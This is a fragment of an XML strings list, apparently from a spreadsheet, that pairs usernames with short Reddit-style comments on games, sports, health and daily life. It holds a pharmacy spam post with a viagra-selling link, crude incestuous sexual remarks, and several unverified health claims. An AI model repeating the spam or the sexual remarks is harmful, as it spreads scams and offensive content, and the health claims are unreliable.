  <si>
    <t>No, Barr said Mueller said as much.</t>
  </si>
  <si>
    <t>tvieno</t>
  </si>
  <si>
    <t>Yeah, I think I were answering a survey that had stupid questions like does the earth orbit the sun, I would answer wrong on purpose, just to skew the results.</t>
  </si>
  <si>
    <t>RoastBeefDisease</t>
  </si>
  <si>
    <t>my real IG has 85 followers and i follow 184. my spam has 48 followers and i follow 185</t>
  </si>
  <si>
    <t>MiharuSenaKanaka</t>
  </si>
  <si>
    <t>Mandatory English isn’t my first language. So basically I’m a female in my early 20s. I have been suffering with mental health issues since I can remember. Mental health problems run through my family on both my mom’s and my dad’s side. My one concern is that, I think I may be mildly schizophrenic. I’ve had plenty of sleepless nights because of it. Something will trigger it, like a photo or sentence and I’ll just be hearing voices or seeing things that aren’t there. I am totally aware that none of it is real but my brain is just trying to trick me and it makes my heart race and I usually end up crying my eyes out and hiding in a corner. Most of the people in my family have dealt with it too. But the thing is, I’m not sure how to bring it up to my doctor to get a proper diagnosis. I’m scared people will think I’m crazy. I’m not too sure what I’m expecting out of this, but any help on how to bring it up/who to bring it up to, would be greatly appreciated.</t>
  </si>
  <si>
    <t>AnonymousCrime2</t>
  </si>
  <si>
    <t>I'm baffled myself. I thought the question meant for establishments that are known as buffet's. But hell, we offered a buffet. Looks like a buffet, smells like a buffet...</t>
  </si>
  <si>
    <t>K1visaHopeful</t>
  </si>
  <si>
    <t>You'll need to explain your status and your kids' statuses....</t>
  </si>
  <si>
    <t>Mandroid96</t>
  </si>
  <si>
    <t>I actually quite enjoyed the story (I know it's divisive), but then I never went back and Did All The Things.</t>
  </si>
  <si>
    <t>DevbLacc</t>
  </si>
  <si>
    <t>God it seems like the only reason I'm on this sub is to see how wrong people are</t>
  </si>
  <si>
    <t>raspymorten</t>
  </si>
  <si>
    <t>Owens has been booked decently most of the time, and has had a lot of success. ... The closet Sami Zayn has been to success over the past three years, was the few months he was Owens' lackey in 2018, in a feud that was just an extension of the Owens/Bryan shit Somebody take me back to Battleground 2016...</t>
  </si>
  <si>
    <t>akareject</t>
  </si>
  <si>
    <t>Had a game today where every new gun I picked up would not reload the first time. Had to double reload every single time.</t>
  </si>
  <si>
    <t>Pops_rustafied</t>
  </si>
  <si>
    <t>Daily "What are you up to today?" Thread x538</t>
  </si>
  <si>
    <t>sideffect_</t>
  </si>
  <si>
    <t>haha i looked it up and i just realized this is what I've been having ever since i can remember, thanks !</t>
  </si>
  <si>
    <t>BillyRipkenJr</t>
  </si>
  <si>
    <t>This guy gets 15 upvotes but I bring up speed and I get downvoted to eternity!?</t>
  </si>
  <si>
    <t>dragislit</t>
  </si>
  <si>
    <t>This is fantastic</t>
  </si>
  <si>
    <t>leewafee</t>
  </si>
  <si>
    <t>I read that it stays in the body for 5 days.. im not sure if it stops ovulation for 5 days.. does it?</t>
  </si>
  <si>
    <t>curiously-optimistic</t>
  </si>
  <si>
    <t>Agreed! Also half these screenshots are 19-22 year old college kids on tinder. No surprises that they’re shallow and/or clueless</t>
  </si>
  <si>
    <t>lostinmysynapses</t>
  </si>
  <si>
    <t>Gandalf the Blazed</t>
  </si>
  <si>
    <t>lainebrainone</t>
  </si>
  <si>
    <t>they have been around for years here, i think they call them salads, lol</t>
  </si>
  <si>
    <t>lyssonearth</t>
  </si>
  <si>
    <t>I totally agree!! Thanks for the comment. These cats are all regularly fed at this gas station, we were just passing through on a road trip and wanted to give them a treat and feed some of the weaker looking ones.</t>
  </si>
  <si>
    <t>TheSkywalker</t>
  </si>
  <si>
    <t>They feel comfortable, but I had to return mine because I listened to these reviews and ordered 0.5 size smaller. They hit my big toe. You should order your same size as ultra boost.</t>
  </si>
  <si>
    <t>Hi JaMoore12! You did not include the image's resolution (the width and height in pixels) in the title. You should put the resolution in brackets at the end of your title. Please check the FAQ in the sidebar for information on how to find the resolution. Thanks for submitting! *I am a bot, and this action was performed automatically. Please [contact the moderators of this subreddit](/message/compose/?to=/r/MoviePosterPorn) if you have any questions or concerns.*</t>
  </si>
  <si>
    <t>firewalker9643</t>
  </si>
  <si>
    <t>I didn’t know. I went in for my yearly eye exam and the optometrist said, “Well we better get you some glasses before you run someone over!” After I got them and put them on I was like, “Holy shit! This is what everything is supposed to look like!?” I just assumed blurry faces and signs were normal.</t>
  </si>
  <si>
    <t>chloe9998</t>
  </si>
  <si>
    <t>This product is better than I expected. Randomly ordered it and wasn't expecting much because of the price. This helps moisturize and reduces my acne. Just be careful not to use a lot as it can make your skin oily and breakout if too much is applied.</t>
  </si>
  <si>
    <t>t9tu</t>
  </si>
  <si>
    <t>Also FYI Guys this thing is only happening in the latest update not the previous ones, I uninstalled the updates. It's working fine but the since there's no dark mode I gotta love with it.</t>
  </si>
  <si>
    <t>CB205EDEE16B24366C87</t>
  </si>
  <si>
    <t>600 since release, no artisan memory or anything considered p2w in my book. So it's mostly inventory, weight, outfits and VP. Didn't buy anything for almost a year. Now it's just money for VP.</t>
  </si>
  <si>
    <t>ylva01</t>
  </si>
  <si>
    <t>I hope hylos become meta oneday :( like zhask and Uranus</t>
  </si>
  <si>
    <t>Original</t>
  </si>
  <si>
    <t>Original Tweet: JeromeTaylor : Well this is concerning. A White House official briefed reporters yesterday and said US are monitoring a buildup of either troops or armed police on China's border with Hong Kong https://t.co/I92FyMp3HM</t>
  </si>
  <si>
    <t>PS420Ninja</t>
  </si>
  <si>
    <t>Enjoy and stay safe.</t>
  </si>
  <si>
    <t>D-Luuxx</t>
  </si>
  <si>
    <t>I’d recommend using faithful 64x. Also, what GPU do you have?</t>
  </si>
  <si>
    <t>EddieRUKiddingVarese</t>
  </si>
  <si>
    <t>Anyone getting to the point where they just scroll through threads looking for posts with pictures and skipping all the verbiage? Maybe it is time to retire from TC?</t>
  </si>
  <si>
    <t>cherriezandberries</t>
  </si>
  <si>
    <t>I don’t.... think.... so..?</t>
  </si>
  <si>
    <t>ChickenWithATopHat</t>
  </si>
  <si>
    <t>I don’t build there because I play in survival. You can’t get to it while wearing power armor, no point in even going to the island besides the bobble head.</t>
  </si>
  <si>
    <t>pmmeyourfishdying</t>
  </si>
  <si>
    <t>So one's been smashed and the other's haven't?</t>
  </si>
  <si>
    <t>Nathannale</t>
  </si>
  <si>
    <t>I was trying to find the specs for the OG Orient Mako I bought on r/watchexchange. I am also looking to get it serviced as it is running a minute fast and has a broken date pusher. Does anyone have any idea what it would cost?</t>
  </si>
  <si>
    <t>NotNowJustMeow</t>
  </si>
  <si>
    <t>I thought the show was the number one slot at one point this season already? Source for bad ratings?</t>
  </si>
  <si>
    <t>DeadQuaithe14</t>
  </si>
  <si>
    <t>Tommen, Myrcella(?), Faegon, and Daenerys.</t>
  </si>
  <si>
    <t>Fitan</t>
  </si>
  <si>
    <t>Why would you allow that as Method though? Method holds all the cards in the negotiations, they are the guild everyone wants to watch, and if needed they can just find another sponsor and hold a nearly identical event just like they have. At the end of the day though people want to watch the winners, and Method has a pretty solid track record of winning world firsts so most viewers will gravitate to them naturally, so they gain absolutely nothing by giving more power to Redbull. I will admit the Method stream has slipped in quality this time but I think that is mostly due to the fact they are trying to have 24hr content, and even with additional guilds it's not exactly fun to watch guild X progress on Ashvane after watching Method do it already. For me personally though I tend to watch individual player PoV's and not watch the main channels because the commentary on both gets pretty old after a while.</t>
  </si>
  <si>
    <t>itsmepuffd</t>
  </si>
  <si>
    <t>After using both OBS Studio for a while then getting SLOBS afterwards for a while, I personally transitioned to using Streamelements and their [OBS.Live](https://OBS.Live) overhaul. [https://streamelements.com/obslive](https://streamelements.com/obslive)</t>
  </si>
  <si>
    <t>rm-r-star</t>
  </si>
  <si>
    <t>This post.</t>
  </si>
  <si>
    <t>ThatOneJediDude1</t>
  </si>
  <si>
    <t>It’s the first inning, he’s just settling in</t>
  </si>
  <si>
    <t>_Area51Guard_</t>
  </si>
  <si>
    <t>Airship</t>
  </si>
  <si>
    <t>hausofmiklaus</t>
  </si>
  <si>
    <t>Their friendship was not only a highlight of the season but also a *SERIES BEST*, and I was truly heartbroken that the move meant they couldn’t continue that start of an amazing relationship.</t>
  </si>
  <si>
    <t>ChiquitaBananaBoat</t>
  </si>
  <si>
    <t>Dear Zachary was heart wrenching</t>
  </si>
  <si>
    <t>TheSlyestEggplant</t>
  </si>
  <si>
    <t>Hey when are the results in?</t>
  </si>
  <si>
    <t>nasisliiike</t>
  </si>
  <si>
    <t>All Twitter does is use their last 2 brain cells to hate on anything and everything, so I doubt Twitter hasn't been bitching....</t>
  </si>
  <si>
    <t>Atlanta-Avenger</t>
  </si>
  <si>
    <t>VAR: looks off man Ref: yeah but the VAR screen is so far away VAR: true, let’s just keep talking a little longer and you should be clear to not check.</t>
  </si>
  <si>
    <t>Quote: : My one hour glucose test came back at 190. I didn’t eat anything for 12 hrs before and sipped water only. I have a three hour test tomorrow. Did anyone else have this high number and still pass the 3 hour? 4 Posts idrawfrommyhead If you’re number is above 200 they diagnose you with GD without three hour test. I know some other people got a 190 and was just immediately diagnosed. From what I’ve seen in the forums, typically people with a high number like 190 have less of a chance of passing the three hour. There’s a higher likelihood that you have GD than not. BUT who knows! You could end up passing the three hour, you just spike really high after sugar then your body adjusts to normal after 2-3 hours.</t>
  </si>
  <si>
    <t>hearnoweevil</t>
  </si>
  <si>
    <t>Don't be a titty hater!</t>
  </si>
  <si>
    <t>BetterThanTaco</t>
  </si>
  <si>
    <t>Yeah my nighthawk gets capped too</t>
  </si>
  <si>
    <t>linotype</t>
  </si>
  <si>
    <t>nah you wrote a bunch of sentences without any punctuation or clearly defined structure hehe</t>
  </si>
  <si>
    <t>daaarkan</t>
  </si>
  <si>
    <t>Use MSI afterburn to manually adjust the GPU curve to max speed(1500) at lower voltage</t>
  </si>
  <si>
    <t>anupvoteforyou</t>
  </si>
  <si>
    <t>I'm not even arguing that Ben is a sniper. I'm just saying you can be considered a "sniper" and not be in a rotation. You can be considered an elite athlete and not be in a rotation. You can have elite handles and not be in a rotation. The league is full of specialists that are at the end of the bench trying to hone other skills to get a crack in the rotation.</t>
  </si>
  <si>
    <t>noname_1337</t>
  </si>
  <si>
    <t>(Mandatory not an X) So my [insert relationship type here] is/used to be an X...</t>
  </si>
  <si>
    <t>Helacious</t>
  </si>
  <si>
    <t>Mobius and Pet Octopus said: Most of those "fears" are not the issue. Just addressing what looks like internet myths. But the study I linked did show that use of nonnutritive sweeteners (including aspartame) can increase your BMI and cardiometabolic risk. The study followed over 405k people over 20 years. https://www.sciencedaily.com/releases/2016/11/161122193100.htm is an article saying that aspartame can in fact affect your metabolism even if it does not affect your insulin directly. The article you linked did not address inflammation either, which is a pretty big deal. There are other concerns I've read about (and experienced tbh) with it changing your tasting preferences. I used to be on board diet soda back in college. I drank that shit every day. I thought sugary soda tasted bad too. Truth is, sugary soda tasted bad because aspartame is sweeter than sugar and my taste buds were too used to the sweeter taste. That may not sound bad but it impacts your taste for all other foods as well, including healthy foods. I think there is enough uncertainty, or even negative evidence, to just either outright avoid aspartame or only consume it on occasion. Granted, there is probably a lot worse you could be consuming. I'm not convinced stevia is the best replacement, but I've seen good arguments for why it's better since they say your body digests it better, causing no inflammation. I haven't jumped on board that train though. It's actually not just CICO that determines fat loss, or even weight loss in general. The idea that all calories are equal would need to be true, but it simply is not. Nor does CICO address hormones like insulin and glucagon. If you take the same exact two people with the same caloric intake but one has high insulin/low glucagon and the other has low insulin/high glucagon... you're not going to have the same results. Not to mention other health concerns such as sweeteners affecting your gut biome (talked about in that video I linked). I think the best part about keto/low glycemic is insulin control, not that it is more satiating even though that is true. It's also anti-inflammatory, which is a big deal. That's why I follow a keto diet. Click to expand... Click to shrink... Youre not changing the laws of thermodynamic with carbs/no carbs. People should worry more about cutting their hyper caloric beverage than worry that aspartame might give them a pound or two over a year than just drinking water due to shifting metabolic syndrome</t>
  </si>
  <si>
    <t>TheOnlyLokiRR</t>
  </si>
  <si>
    <t>2000 trophies are minimum. We need level 8 people for clan wars. You need to be an European to join the clan. I'm happy about everyone who joins :)</t>
  </si>
  <si>
    <t>delia2</t>
  </si>
  <si>
    <t>That’s great news. Thanks for sharing!</t>
  </si>
  <si>
    <t>cancertoast</t>
  </si>
  <si>
    <t>I did read an article on that. They wanted more powder, a bigger round, and a cheaper propellant. All skewing the original design. The jam rate shot through the rough when they force fed those design changes.</t>
  </si>
  <si>
    <t>sai_gunslinger</t>
  </si>
  <si>
    <t>Yeah, it's pretty rough. We would be in fine shape if my boyfriend wasn't paying almost $600 a month in child support. It's crippling us. Not that he shouldn't pay support at all, but it severely hinders how much house we can afford. But it's the state minimum because it's 17% of his income, so we can't get it reduced.</t>
  </si>
  <si>
    <t>PorknCheesee</t>
  </si>
  <si>
    <t>Not that often no, usually I get that once when I launch Apex then every game after that is fine for the most part every maybe 5-6 matches will happen again.</t>
  </si>
  <si>
    <t>Ssj_Akatsuki</t>
  </si>
  <si>
    <t>Did he do something in the 2nd battle?</t>
  </si>
  <si>
    <t>johnklimo</t>
  </si>
  <si>
    <t>Assuming your &lt;21 years old, you can feel free to invest in individual companies to seek higher returns over the short term. But, if you were planning on keeping that money in the market for +10 years, just throw it in a total stock market ETF, it’ll have no additional buy in, and you’ll be well diversified across the entire US stock market. So as our economy performs, so will your total market shares. I personally am 21 years old, and have about $6k invested into Vanguards Total Stock Market (VTI) and $3k in the international stock market (VXUS). I’m in no way an expert, but this is a strategy many successful investors follow for the long term.</t>
  </si>
  <si>
    <t>NoseBuzz</t>
  </si>
  <si>
    <t>Meh you can post if you want. The people who are uncomfortable just wont rate you thats all</t>
  </si>
  <si>
    <t>fkuthere</t>
  </si>
  <si>
    <t>The category isnt about numbers but about quality and pop culture impact and BWL doesnt have any of them. Thats why You need to calm down Is nominated even when ME! Had better numbers.</t>
  </si>
  <si>
    <t>InsightedMalfunction</t>
  </si>
  <si>
    <t>I believe it was mentioned somewhere that the Didact had known of more Contender-Class AIs, but wouldn't activate or disclose their location for some reason. There was a third Contender-Class AI revealed to us as well; the one who guards the Janus Key.</t>
  </si>
  <si>
    <t>mama_j1836</t>
  </si>
  <si>
    <t>This is a breath of fresh air. Beautiful colour!</t>
  </si>
  <si>
    <t>stackz07</t>
  </si>
  <si>
    <t>I blow through a few pair of black H&amp;M Slim Jeans a year. What are a quality pair that are great fit, not selvage, and won't fair for years?</t>
  </si>
  <si>
    <t>SpiritedTyper</t>
  </si>
  <si>
    <t>Girls: finger rings and artsy shirts but these aren't make-it-or-break-it requirements Boys: bland clothes like button ups and sweaters but similarly I'm not going to pre-judge someone if they wear a unique style</t>
  </si>
  <si>
    <t>Blutlol</t>
  </si>
  <si>
    <t>This is just incalculably bad power level assessment.</t>
  </si>
  <si>
    <t>disneylovesme</t>
  </si>
  <si>
    <t>And jeam m auel wrote them as people that could sign. Interesting take on neanderthals.</t>
  </si>
  <si>
    <t>awbattles</t>
  </si>
  <si>
    <t>Here’s the thing though, dipping ranger is perhaps TOO similar to Druid. For example, a one level dip means giving up a spellcasting level, delaying wild shape progression, and losing a level for your animal companion or domain. In exchange you’ll get wild empathy (which you already have) favored enemy +1 (situational), and a +1 to following tracks. That’s...pretty terrible. In contrast, a level of unchained monk would get you wisdom to AC when unarmored (such as when in wild shape), and improved unarmed strikes, stunning fist, and one other feat. As far as the role playing goes, a single level of anything can be easily explained by your character seeing/befriending someone with that class, being impressed, and asking them to teach you a couple tricks. If you multiclass more than one level...well, you’ll be a terrible Druid. It’s a class in which almost all of your good abilities scale with your level, so you’d be a crippled caster with an incredibly weak/worthless animal companion and no good wild shape options. Hammy is right on the money with that.</t>
  </si>
  <si>
    <t>camy252</t>
  </si>
  <si>
    <t>Anyone know how the Ryzen 3000 cpus and RX5700XT cards are doing in Arma 3? Looking to get an upgrade next month and just wondering how these chips and cards are performing. Benchmarking sites all focus on latest AAA games but I'm curious how games like Arma 3 do.</t>
  </si>
  <si>
    <t>Chester_A_Snarkther</t>
  </si>
  <si>
    <t>Going through old pictures and found this [Studebaker Silver Hawk] I saw on a rainy day a few years ago</t>
  </si>
  <si>
    <t>pantherdad</t>
  </si>
  <si>
    <t>Friday they were pulling water on old hickory and river channel up lake was 70 degrees. Back of creeks mid 80’s. Did manage a few on a big worm in creeks. Tried top water early on channel but could not get fish to take bait. Fish would come up on bait but wouldn’t eat it. Good luck.</t>
  </si>
  <si>
    <t>MJN91075</t>
  </si>
  <si>
    <t>I'm kind of curious about what my cousin's tits look like</t>
  </si>
  <si>
    <t>fistasaverb</t>
  </si>
  <si>
    <t>What people are doing and why this post was necessary is called gatekeeping. You are correct. This is an anti-gatekeeping post.</t>
  </si>
  <si>
    <t>Satotiga</t>
  </si>
  <si>
    <t>I know this isn't the answer you want but I wouldn't make an attempt to contact her if that is the method you've used to discover her social media accounts. Unless she is extremely down to earth then I can't see any way that someone wouldn't find it an instant red flag that you've trawled through images to find them. I can imagine her feeling extremely uncomfortable if she finds this out.</t>
  </si>
  <si>
    <t>Ayavaron</t>
  </si>
  <si>
    <t>&gt; the US was a tyrannical matriarchy.) I think he first wrote about this in Dilbert Future, ~1997ish.</t>
  </si>
  <si>
    <t>WarsawGuard</t>
  </si>
  <si>
    <t>I don't know why they don't make shinies certain catches -- at least with the go plus. It would mean so many folks wouldn't drive and look at their phones ...</t>
  </si>
  <si>
    <t>CaffeineAndCardio</t>
  </si>
  <si>
    <t>Not true for me. What platform are you using?</t>
  </si>
  <si>
    <t>Video-Bandit</t>
  </si>
  <si>
    <t>Pretty sure most of the persona 5 18+ women are under 30 making it a bit more acceptable I have seen many people at 18 date people in there 20s and Japan's age of consent is lower then the states, I did not disagree with the teacher student one that is always frowned upon especially here in the states</t>
  </si>
  <si>
    <t>UofAThrowAway0292</t>
  </si>
  <si>
    <t>Doesn't apply to you. It's for people who just finished their second year. If you're interested in Co-op you can apply this upcoming winter. Those newsletter-style emails get sent to everyone in the BCom program fyi, you should expect a fair amount of them that don't really apply to you.</t>
  </si>
  <si>
    <t>Sean_David_</t>
  </si>
  <si>
    <t>True, but it still is a pretty accurate representation of life to me</t>
  </si>
  <si>
    <t>arbitoryraptor2</t>
  </si>
  <si>
    <t>I believe the correct tense, good sir, is “yoted”.</t>
  </si>
  <si>
    <t>AcceptableBook</t>
  </si>
  <si>
    <t>I'm not sure if I'm remembering this correctly, but isn't [spoiler](#s "Taylor more than happy to join the Undersiders even when she knows they are villains?") I'm not really sure we can credit her with heroic intentions in that case. It has been a long time since I read that story though, so I might be remembering stuff properly</t>
  </si>
  <si>
    <t>oneshgarde</t>
  </si>
  <si>
    <t>Aww, thank you for taking the time to check it out and writing back your thoughts! Hearing stuff like that is always great! Not sure what kind of day you've been having, but I hope it wasn't too filled with sadness. Here's to music guiding us through, all the time. If you liked the song, please follow me on [Spotify](https://open.spotify.com/artist/4tvk2iSS0wzb6JJDbH55Zs?si=x78aGUoEQUCf7q81F3Dh5w) and [YouTube](https://www.youtube.com/spellsandcurses) because I'm gonna be releasing more music and videos in the coming weeks!</t>
  </si>
  <si>
    <t>countryfriedwings</t>
  </si>
  <si>
    <t>So d&amp;d the game but you can’t do as much becomes there is programmed quest instead of imagination</t>
  </si>
  <si>
    <t>MrBigBMinus</t>
  </si>
  <si>
    <t>I drive 50 miles or more to work each day. We had a kid two years ago and daycare and bills eat up most of the money we would have to do anything with let alone pay a car payment. My car is closing in on 200k miles. I wouldnt use the money for fun, just to ensure we have a better car and that my kid would be safe and not worry about breaking down on the side of the road and missing work. Life is fun lol!</t>
  </si>
  <si>
    <t>MGsubbie</t>
  </si>
  <si>
    <t>I wouldn't call decreasing input latency by about 10ms "negligible." https://www.youtube.com/watch?v=uzp8z1i5-Hc</t>
  </si>
  <si>
    <t>conch87</t>
  </si>
  <si>
    <t>Im still running around in a long coat from last seasons eververse.. and dont you dare call it a dress!</t>
  </si>
  <si>
    <t>TigrisGarcon</t>
  </si>
  <si>
    <t>Ayee thanks brotha I appreciate it!!</t>
  </si>
  <si>
    <t>Lying_idiot</t>
  </si>
  <si>
    <t>The thing about Shred is that it is addictive as hell. You get used to the punch through, and change your playstyle to take advantage of it. small movement to punch through that extra target, watching the minimap and shooting enemies through walls, that kind of stuff. I consider the mod pretty much obligatory in my builds now. Shred is the best way to get punch through on a gun, can't beat the slot effectiveness, and Primed Shred goes even further, even more punch through while giving almost as much rate of fire as Speed Trigger!</t>
  </si>
  <si>
    <t>bmmy9f</t>
  </si>
  <si>
    <t>This is fantastic and much easier. I will look into it more and see if it fits the needs. I appreciate the suggestion.</t>
  </si>
  <si>
    <t>blTQTqPTtX</t>
  </si>
  <si>
    <t>Something likely happened, might not be capture just yet, but maybe gunfire. Twitter might be unreliable noise but even the United State special force taking down Bin Laden got captured by social media complaint on weird helicopter noise in Islamabad.</t>
  </si>
  <si>
    <t>jumpingjacks07</t>
  </si>
  <si>
    <t>Doggo hears human, doggo blinks eyes and realises human has rectangular object; seems soft. Human approaches Doggo with blanket. Doggo: aww yis, it’s a blanket! *wags tail*. Tuck me in kind stranger. Bless you kind soul Human: who’s a good boy? Doggo: Me! Human: good night! Doggo: bless you human</t>
  </si>
  <si>
    <t>bcss20</t>
  </si>
  <si>
    <t>You mean Andy Serkis lighting up?</t>
  </si>
  <si>
    <t>jordzkie05</t>
  </si>
  <si>
    <t>Im always of the opinion that finishers shouldn't always the thing that finishes the match. I attribute this to watching Hajime no Ippo, when Ippo's Dempsey Roll gets countered hard, he gets knocked down almost cold.</t>
  </si>
  <si>
    <t>lord_darovit</t>
  </si>
  <si>
    <t>You can have the "no sound in space" atmosphere while still having sound in space. Battlestar Galactica handled this masterfully imo: https://www.youtube.com/watch?v=8A4224c_jHQ Space still feels like a void, but there are subtle wooshes and things like that, yet they are muffled. The gunshots, explosions, moving of ships, etc. It adds weight. If Starfield were to aim to create that feeling, I'd want them to copy that style. Imo literally no sound would suck. Stylization is good.</t>
  </si>
  <si>
    <t>A1ex8orth</t>
  </si>
  <si>
    <t>My mommy found a new daddy and he’s going to do the same</t>
  </si>
  <si>
    <t>Sinder</t>
  </si>
  <si>
    <t>Finally</t>
  </si>
  <si>
    <t>Pete</t>
  </si>
  <si>
    <t>This still sounds to be a grounding issue. Even if the ground connections were checked, this may be an issue with a ground wire that may have high resistance or damage to it with it needing to be replaced. It would be a good idea to have the ground wires leading from the battery to the body and engine tested and inspected for any bulging issues or any corrosion or damage to any of the wiring with the wiring needing to be replaced or repaired. Thanks, Pete</t>
  </si>
  <si>
    <t>buCk-</t>
  </si>
  <si>
    <t>Acid rap - Chance the rapper</t>
  </si>
  <si>
    <t>MisterWinchester</t>
  </si>
  <si>
    <t>You could try some non-salt juice in your suorin if you still have it; my Caliburn can totally do lung hits, it’s just not advisable with salts.</t>
  </si>
  <si>
    <t>Minimum_Cantaloupe</t>
  </si>
  <si>
    <t>That's not a strike, it's a boycott.</t>
  </si>
  <si>
    <t>Aniceguy96</t>
  </si>
  <si>
    <t>[Be Nice by The Black Eyed Peas](https://www.youtube.com/watch?v=gHN-EhL8x3g) [I'm With Her by Le Tigre](https://www.youtube.com/watch?v=vLGFyxAP0QE) [Sensual Pantsuit Anthem by Lena Dunham](https://www.youtube.com/watch?v=H51HuNX41Fg) These songs are unlistenable atrocities. Nice Guy is godawful, but I don't think it comes even remotely close to these.</t>
  </si>
  <si>
    <t>caesaronambien</t>
  </si>
  <si>
    <t>“You’ve captivated my soul” h e l p</t>
  </si>
  <si>
    <t>That_one_Canuck</t>
  </si>
  <si>
    <t>Ok, this really belongs in this sub</t>
  </si>
  <si>
    <t>Itsthebitsfam</t>
  </si>
  <si>
    <t>Black cab drivers are assholes though &amp; they charge a ridiculous fee. Uber for me!</t>
  </si>
  <si>
    <t>Etovia</t>
  </si>
  <si>
    <t>&gt; I haven't tried a purchase or chat yet though. Be careful they are anti-Bitcoin and are now known proponents of altcoins, including the one that has 4% of Bitcoin's hashrate, incites users to never validate the blockchain, and yet tries to claim name of the Bitcoin.</t>
  </si>
  <si>
    <t>Stormfly</t>
  </si>
  <si>
    <t>I never said I was an animal lover, it wasn't an argument, it was a non-rhetorical question. Although others have said that "pet lover" would be more accurate for other people who have that same mentality, which answered my question. I'm also not being very serious here, I was trying to make the discussion a bit more light hearted.</t>
  </si>
  <si>
    <t>Dobbeo</t>
  </si>
  <si>
    <t>The Matrix</t>
  </si>
  <si>
    <t>jiar300</t>
  </si>
  <si>
    <t>This is some types of games you can make in the game Dreams on ps4</t>
  </si>
  <si>
    <t>PiscesEqualsFishty9</t>
  </si>
  <si>
    <t>Pull my strings and I’ll go far.</t>
  </si>
  <si>
    <t>Spackleberry</t>
  </si>
  <si>
    <t>Yes! Especially how her voice cracks when she said, "I wonder how I would look... as a blonde!"</t>
  </si>
  <si>
    <t>cyclingkingsley</t>
  </si>
  <si>
    <t>What the hell. They think they can go all in on...a wild card spot?</t>
  </si>
  <si>
    <t>6IXFootball</t>
  </si>
  <si>
    <t>The last sentence really helped me understand the gravity of the situation.</t>
  </si>
  <si>
    <t>ThatBoiLogic</t>
  </si>
  <si>
    <t>A Clockwork Orange. One of the most disturbing movies i have ever seen.</t>
  </si>
  <si>
    <t>plantaires</t>
  </si>
  <si>
    <t>Don’t really have too much experience but I’d say definitely get stretch fabric, and keep in mind which way the fabric stretches before you cut out your pattern. Also you may have to double stitch or zigzag stitch to reinforce the seams and allow them to stretch too, otherwise the threads will snap (found this out the hard way).</t>
  </si>
  <si>
    <t>JimH10</t>
  </si>
  <si>
    <t>Very interesting, thank you. I'm thnking about the same process, so I appreciate the post. Just a comment: there are some strange word-breaks (I won't say "hyphenation" since there is no hyphen.). You might want to have another look.</t>
  </si>
  <si>
    <t>allancaesar</t>
  </si>
  <si>
    <t>Nah man hes the cult leader in Werewolf.</t>
  </si>
  <si>
    <t>VonGeisler</t>
  </si>
  <si>
    <t>It’s also helpful (or not - your decision) knowing Anesthesiologists are amongst the higher users of drugs in the medical field. Guess it’s like being tased and pepper sprayed during police training. Gotta Test out then drugs.</t>
  </si>
  <si>
    <t>promemster</t>
  </si>
  <si>
    <t>I understand, someone don't know how to play Tic-tac-toe</t>
  </si>
  <si>
    <t>AlaskanBased</t>
  </si>
  <si>
    <t>There’s only emblems that track specific raid completions, however there is a website called [Raid Report](https://raid.report) that you can use to track overall completions! I wouldn’t mind an emblem that tracked that stat though</t>
  </si>
  <si>
    <t>SneakyStuart</t>
  </si>
  <si>
    <t>You’re not going to find anything open on Thanksgiving in VT other than Chinese places and gas stations</t>
  </si>
  <si>
    <t>Psychko</t>
  </si>
  <si>
    <t>These are a few of the car meet clubs that I've heard about: * /r/LosSantosAutoClubPS4 for PS4 • https://steamcommunity.com/groups/GTAVCARMEET • You might want to check out the Xbox club, GTA Car Meets. From your Xbox One dashboard go to the Community Tab &gt; Clubs on Xbox &gt; Find a club</t>
  </si>
  <si>
    <t>metal_whisperer69</t>
  </si>
  <si>
    <t>I was wondering the same thing, i thought I missed something in the library to inlock the next one</t>
  </si>
  <si>
    <t>jzmmm</t>
  </si>
  <si>
    <t>Red doesn't seem to work. But I do see green, yellow, and blue shirts.</t>
  </si>
  <si>
    <t>longshot</t>
  </si>
  <si>
    <t>That's what occurs during a trial</t>
  </si>
  <si>
    <t>&gt;&gt;15370121 Because that doesn't have the same fetish appeal.</t>
  </si>
  <si>
    <t>KarlBarx2</t>
  </si>
  <si>
    <t>I would be shocked if he could actually name the Central Park 5.</t>
  </si>
  <si>
    <t>Throwawayaccount_big</t>
  </si>
  <si>
    <t>Sister or mom because you can have wed with them and start eating their vagina first</t>
  </si>
  <si>
    <t>SteinsWayLife</t>
  </si>
  <si>
    <t>like 90% sure Bekon is doing the main vocals and Joji's is just in the back, so corny to not credit him in the song title</t>
  </si>
  <si>
    <t>Bernardquato</t>
  </si>
  <si>
    <t>You've made your position very well!! viagra moa buy viagra viagra online sale canada viagra pills online sales viagra generic viagra online viagra vs cialis vs levitra cheap viagra propafenone and viagra cialis viagra pens viagra generic viagra headquarters - https://genericviagrarcp.com cod generic pal pay viagra viagra quicker good online place to buy viagra</t>
  </si>
  <si>
    <t>USvSSR</t>
  </si>
  <si>
    <t>99% crimean population voted for Russia. Before little green men's. For last 28 years.</t>
  </si>
  <si>
    <t>Kissmekillme16</t>
  </si>
  <si>
    <t>It's $13, not like he spent a fortune on her.</t>
  </si>
  <si>
    <t>DaoIsTheWay</t>
  </si>
  <si>
    <t>free advertisement for whom?</t>
  </si>
  <si>
    <t>Sotus30</t>
  </si>
  <si>
    <t>I was leaning towards NAH but when I read about the retirement savings redirecting to his daughter's college fund, he is definitely the AH, and you are NTA. I would say that, if he is the love of your life, maybe you can make a new agreement regarding her. One that will not affect your finances, emotional life, and will also let him have his kid. Set boundaries. If that doesn't work, I'm very sorry OP.</t>
  </si>
  <si>
    <t>Ann</t>
  </si>
  <si>
    <t>Chase, here is just a bit of info, but if the topic interests you, just google choice within public schools and you can read about all day. "Few districts have universal enrollment. In districts with universal enrollment like Washington D.C., Denver , and New Orleans , parents fill out one application that encompasses all district-operated and charter schools as part of a district-wide lottery system. Families rank their top school choices, and an algorithm matches students with available seats."</t>
  </si>
  <si>
    <t>nukefudge</t>
  </si>
  <si>
    <t>Hmm, can't seem to find it out there. I think. Got a link?</t>
  </si>
  <si>
    <t>xenleah</t>
  </si>
  <si>
    <t>If you blink to their side and turn 90 degrees it will make it easier for you to stick as their strafing will now be moving away and towards you instead of left and right. Also dropping pulse bombs by blinking off of high ground can pay off. I usually ult then blink into my target so the sticky comes off without much delay.</t>
  </si>
  <si>
    <t>MrBokbagok</t>
  </si>
  <si>
    <t>two run fuck up, ill take it</t>
  </si>
  <si>
    <t>NorthernLaw</t>
  </si>
  <si>
    <t>Kid stop downvoting idiot</t>
  </si>
  <si>
    <t>PhillyPhilly4133</t>
  </si>
  <si>
    <t>I'll turn that blue dress white.</t>
  </si>
  <si>
